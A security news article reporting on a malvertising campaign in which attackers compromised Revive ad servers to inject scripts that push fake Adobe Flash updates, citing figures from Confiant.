With a malvertising campaign, a group of attackers is trying to infect the computers with malware. Confiant says that almost 50 advertising servers are affected.
“If we take a look at the volumes behind just one of the compromised RTB ad servers – we see spikes of up to 1.25 [million] affected ad impressions in a single day,” said Eliya Stein, a Senior Security Engineer at Confiant.
Malicious Script That Retrieves Content From A New Domain
Once the attackers have taken control of the advertising server, in addition to the advertising that is actually distributed, they also deliver a disguised malicious script that retrieves content from a new domain. This is then used to deliver content from an advertising network that is notorious for the spread of malware. Usually, a banner is displayed to the user, which pretends to be a flash update and wants to tempt the user to install a program. It is unclear which malware is to be installed specifically for users.
The Attackers Make At Least A Minimal Effort To Hide Their Activities
Cookies ensure that the malware is not displayed to users too often .The malware script also checks whether the user has opened the developer console.
Compromised Revive servers allow cybercriminals to add malicious code to existing ads unnoticed. Once these ads are loaded from legitimate websites, the malicious code tries to redirect visitors to malware websites. There, users are often offered fake updates for the Adobe Flash Player.
While the so called malvertising campaign is not new, the approach differs significantly from the strategies of other groups. So far, they have limited themselves to buying advertising space on legitimate websites through false advertising companies and then filling these spaces with malicious advertising. This tactic works because the code for ads may not be adequately checked or because dubious vendors tolerate the malvertising campaign business because it brings them revenue and profits. Capturing ad servers is very rare, especially on this scale.